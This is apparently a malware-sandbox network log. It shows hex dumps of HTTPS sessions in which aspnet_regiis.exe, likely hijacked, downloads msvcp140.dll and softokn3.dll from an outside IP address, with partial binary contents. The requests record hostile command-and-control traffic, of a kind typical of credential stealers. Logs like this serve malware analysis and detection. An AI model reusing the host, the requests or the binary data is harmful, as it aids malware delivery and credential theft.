                                                                                                                          2024-10-03 01:27:01 UTC16384INData Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b
                                                                                                                          Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                          2024-10-03 01:27:01 UTC16384INData Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48
                                                                                                                          Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.75795949.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:27:02 UTC196OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:02 UTC262INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:02 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 450024
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Thursday, 03-Oct-2024 01:27:02 GMT
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-03 01:27:02 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                          2024-10-03 01:27:02 UTC16384INData Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d
                                                                                                                          Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
                                                                                                                          2024-10-03 01:27:02 UTC16384INData Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff
                                                                                                                          Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                                          2024-10-03 01:27:03 UTC16384INData Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45
                                                                                                                          Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                                                          2024-10-03 01:27:03 UTC16384INData Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b
                                                                                                                          Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                          2024-10-03 01:27:03 UTC16384INData Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc
                                                                                                                          Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                                                          2024-10-03 01:27:03 UTC16384INData Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01
                                                                                                                          Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                                                          2024-10-03 01:27:03 UTC16384INData Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8
                                                                                                                          Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                                                          2024-10-03 01:27:03 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c
                                                                                                                          Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|
                                                                                                                          2024-10-03 01:27:03 UTC16384INData Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83
                                                                                                                          Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.75796049.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:27:04 UTC196OUTGET /softokn3.dll HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:04 UTC262INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:04 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 257872
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Thursday, 03-Oct-2024 01:27:04 GMT
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-03 01:27:04 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                          2024-10-03 01:27:04 UTC16384INData Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89
                                                                                                                          Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                                                          2024-10-03 01:27:04 UTC16384INData Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8
                                                                                                                          Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                                                          2024-10-03 01:27:04 UTC16384INData Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00
                                                                                                                          Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                                          2024-10-03 01:27:04 UTC16384INData Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23
                                                                                                                          Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                                                          2024-10-03 01:27:04 UTC16384INData Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00
                                                                                                                          Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                                                          2024-10-03 01:27:04 UTC16384INData Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00
                                                                                                                          Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
